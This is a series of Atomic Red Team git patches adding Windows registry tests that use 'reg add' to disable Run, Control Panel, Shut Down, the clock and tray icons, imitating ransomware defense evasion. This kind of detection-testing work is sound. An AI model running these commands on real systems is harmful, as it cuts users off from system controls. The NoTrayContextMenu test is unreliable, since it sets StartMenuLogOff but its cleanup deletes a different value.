+  auto_generated_guid: d29b7faf-7355-4036-9ed3-719bd17951ed
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to Disable changes to Taskbar and Start Menu Settings Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Activate Windows NoTrayContextMenu Group Policy Feature
+  auto_generated_guid: 4d72d4b1-fa7b-4374-b423-0fe326da49d2
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to Disable context menu for taskbar Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Activate Windows NoPropertiesMyDocuments Group Policy Feature
+  auto_generated_guid: 20fc9daa-bd48-4325-9aff-81b967a84b1d
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to hide Properties from "My Documents icon" Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /t REG_DWORD /d 1 
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Hide Windows Clock Group Policy Feature
+  auto_generated_guid: 8023db1e-ad06-4966-934b-b6a0ae52689e
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to Hide Clock Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Windows HideSCAHealth Group Policy Feature
+  auto_generated_guid: a4637291-40b1-4a96-8c82-b28f1d73e54e
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to remove security and maintenance icon Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Windows HideSCANetwork Group Policy Feature
+  auto_generated_guid: 3e757ce7-eca0-411a-9583-1c33b8508d52
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to remove the networking icon Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Windows HideSCAPower Group Policy Feature
+  auto_generated_guid: 8d85a5d8-702f-436f-bc78-fcd9119496fc
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to remove the battery icon Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Windows HideSCAVolume Group Policy Feature
+  auto_generated_guid: 7f037590-b4c6-4f13-b3cc-e424c5ab8ade
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to remove the volume icon Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect..
+    See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true

From cbf89911c13413ef868c7f7c1bcfe0c78b84b70a Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Wed, 16 Mar 2022 00:45:05 +0000
Subject: [PATCH 54/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/used_guids.txt | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 88d6f1b4..fb1c1628 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -913,3 +913,17 @@ b51239b4-0129-474f-a2b4-70f855b9f2c2
 640cbf6d-659b-498b-ba53-f6dd1a1cc02c
 5e09bed0-7d33-453b-9bf3-caea32bff719
 c6c34f61-1c3e-40fb-8a58-d017d88286d8
+93386d41-525c-4a1b-8235-134a628dee17
+d49ff3cc-8168-4123-b5b3-f057d9abbd55
+ffbb407e-7f1d-4c95-b22e-548169db1fbd
+a450e469-ba54-4de1-9deb-9023a6111690
+5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4
+12f50e15-dbc6-478b-a801-a746e8ba1723
+d29b7faf-7355-4036-9ed3-719bd17951ed
+4d72d4b1-fa7b-4374-b423-0fe326da49d2
+20fc9daa-bd48-4325-9aff-81b967a84b1d
+8023db1e-ad06-4966-934b-b6a0ae52689e
+a4637291-40b1-4a96-8c82-b28f1d73e54e
+3e757ce7-eca0-411a-9583-1c33b8508d52
+8d85a5d8-702f-436f-bc78-fcd9119496fc
+7f037590-b4c6-4f13-b3cc-e424c5ab8ade

From 924cb2491c77ceb3a54ebcee4ac92b2b69370b52 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Wed, 16 Mar 2022 00:45:11 +0000
Subject: [PATCH 55/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  14 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  14 +
 atomics/Indexes/Indexes-Markdown/index.md     |  14 +
 .../Indexes/Indexes-Markdown/windows-index.md |  14 +
 atomics/Indexes/index.yaml                    | 278 +++++++++-
 atomics/T1112/T1112.md                        | 520 +++++++++++++++++-
 6 files changed, 838 insertions(+), 16 deletions(-)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 440e572d..d9dd67a6 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -488,6 +488,20 @@ defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d113
 defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
 defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
 defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
+defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
+defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
+defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
+defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
+defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
+defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
+defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
+defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
+defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
+defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
+defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
+defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
+defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
+defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 7415432b..5878040a 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -318,6 +318,20 @@ defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d113
 defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
 defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
 defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
+defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
+defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
+defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
+defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
+defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
+defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
+defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
+defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
+defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
+defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
+defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
+defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
+defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
+defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 85d3ea02..10082dba 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -763,6 +763,20 @@
   - Atomic Test #14: Disable Windows LogOff Button [windows]
   - Atomic Test #15: Disable Windows Change Password Feature [windows]
   - Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
+  - Atomic Test #17: Activate Windows NoDesktop Group Policy Feature [windows]
+  - Atomic Test #18: Activate Windows NoRun Group Policy Feature [windows]
+  - Atomic Test #19: Activate Windows NoFind Group Policy Feature [windows]
+  - Atomic Test #20: Activate Windows NoControlPanel Group Policy Feature [windows]
+  - Atomic Test #21: Activate Windows NoFileMenu Group Policy Feature [windows]
+  - Atomic Test #22: Activate Windows NoClose Group Policy Feature [windows]
+  - Atomic Test #23: Activate Windows NoSetTaskbar Group Policy Feature [windows]
+  - Atomic Test #24: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
+  - Atomic Test #25: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
+  - Atomic Test #26: Hide Windows Clock Group Policy Feature [windows]
+  - Atomic Test #27: Windows HideSCAHealth Group Policy Feature [windows]
+  - Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows]
+  - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
+  - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index e93541ee..78c1737f 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -530,6 +530,20 @@
   - Atomic Test #14: Disable Windows LogOff Button [windows]
   - Atomic Test #15: Disable Windows Change Password Feature [windows]
   - Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
+  - Atomic Test #17: Activate Windows NoDesktop Group Policy Feature [windows]
+  - Atomic Test #18: Activate Windows NoRun Group Policy Feature [windows]
+  - Atomic Test #19: Activate Windows NoFind Group Policy Feature [windows]
+  - Atomic Test #20: Activate Windows NoControlPanel Group Policy Feature [windows]
+  - Atomic Test #21: Activate Windows NoFileMenu Group Policy Feature [windows]
+  - Atomic Test #22: Activate Windows NoClose Group Policy Feature [windows]
+  - Atomic Test #23: Activate Windows NoSetTaskbar Group Policy Feature [windows]
+  - Atomic Test #24: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
+  - Atomic Test #25: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
+  - Atomic Test #26: Hide Windows Clock Group Policy Feature [windows]
+  - Atomic Test #27: Windows HideSCAHealth Group Policy Feature [windows]
+  - Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows]
+  - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
+  - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
   - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index f3b8af6a..6074038f 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -31782,7 +31782,7 @@ defense-evasion:
       auto_generated_guid: ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8
       description: |
         Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
-        See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+        See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
       supported_platforms:
       - windows
       executor:
@@ -31800,7 +31800,7 @@ defense-evasion:
       auto_generated_guid: d2561a6d-72bd-408c-b150-13efe1801c2a
       description: |
         Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
-        See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+        See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
       supported_platforms:
       - windows
       executor:
@@ -31818,7 +31818,7 @@ defense-evasion:
       auto_generated_guid: af254e70-dd0e-4de6-9afe-a994d9ea8b62
       description: |
         Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
-        See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+        See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
       supported_platforms:
       - windows
       executor:
@@ -31836,7 +31836,7 @@ defense-evasion:
       auto_generated_guid: c0d6d67f-1f63-42cc-95c0-5fd6b20082ad
       description: |
         Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
-        See how remcos rat abuse this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
+        See how remcos rat abuses this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
       supported_platforms:
       - windows
       executor:
@@ -31854,7 +31854,7 @@ defense-evasion:
       auto_generated_guid: 6e0d1131-2d7e-4905-8ca5-d6172f05d03d
       description: |
         Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
-        See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
+        See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
       supported_platforms:
       - windows
       executor:
@@ -31872,7 +31872,7 @@ defense-evasion:
       auto_generated_guid: e246578a-c24d-46a7-9237-0213ff86fb0c
       description: |
         Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
-        See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
+        See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
       supported_platforms:
       - windows
       executor:
@@ -31888,7 +31888,7 @@ defense-evasion:
       auto_generated_guid: d4a6da40-618f-454d-9a9e-26af552aaeb0
       description: |
         Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
-        See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
+        See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
       supported_platforms:
       - windows
       executor:
@@ -31906,7 +31906,7 @@ defense-evasion:
       auto_generated_guid: 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56
       description: |
         Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
-        See how ransomware abuse this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
+        See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
       supported_platforms:
       - windows
       executor:
@@ -31917,6 +31917,268 @@ defense-evasion:
         cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
           /v DisableLockWorkstation /f >nul 2>&1
 
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoDesktop Group Policy Feature
+      auto_generated_guid: 93386d41-525c-4a1b-8235-134a628dee17
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to hide all icons on Desktop Group Policy. \nTake note that
+        some Group Policy changes might require a restart to take effect.\nSee how
+        Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoDesktop /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoDesktop /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoRun Group Policy Feature
+      auto_generated_guid: d49ff3cc-8168-4123-b5b3-f057d9abbd55
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Run menu from Start Menu Group Policy.
+        Take note that some Group Policy changes might require a restart to take effect.
+        See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoRun /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\"
+          /v NoRun /f \n"
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoFind Group Policy Feature
+      auto_generated_guid: ffbb407e-7f1d-4c95-b22e-548169db1fbd
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Search menu from Start Menu Group Policy.
+        Take note that some Group Policy changes might require a restart to take effect.
+        See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoFind /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoFind /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoControlPanel Group Policy Feature
+      auto_generated_guid: a450e469-ba54-4de1-9deb-9023a6111690
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to Disable Control Panel Group Policy. \nTake note that some
+        Group Policy changes might require a restart to take effect.\nSee how Trojan
+        abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoControlPanel /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoControlPanel /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoFileMenu Group Policy Feature
+      auto_generated_guid: 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to Remove File menu from Windows Explorer Group Policy. \nTake
+        note that some Group Policy changes might require a restart to take effect.\nSee
+        how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoFileMenu /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoFileMenu /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoClose Group Policy Feature
+      auto_generated_guid: 12f50e15-dbc6-478b-a801-a746e8ba1723
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to Disable and remove the Shut Down command Group Policy.
+        \nTake note that some Group Policy changes might require a restart to take
+        effect.\nSee how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoClose /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoClose /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoSetTaskbar Group Policy Feature
+      auto_generated_guid: d29b7faf-7355-4036-9ed3-719bd17951ed
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to Disable changes to Taskbar and Start Menu Settings Group
+        Policy. \nTake note that some Group Policy changes might require a restart
+        to take effect.\nSee how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
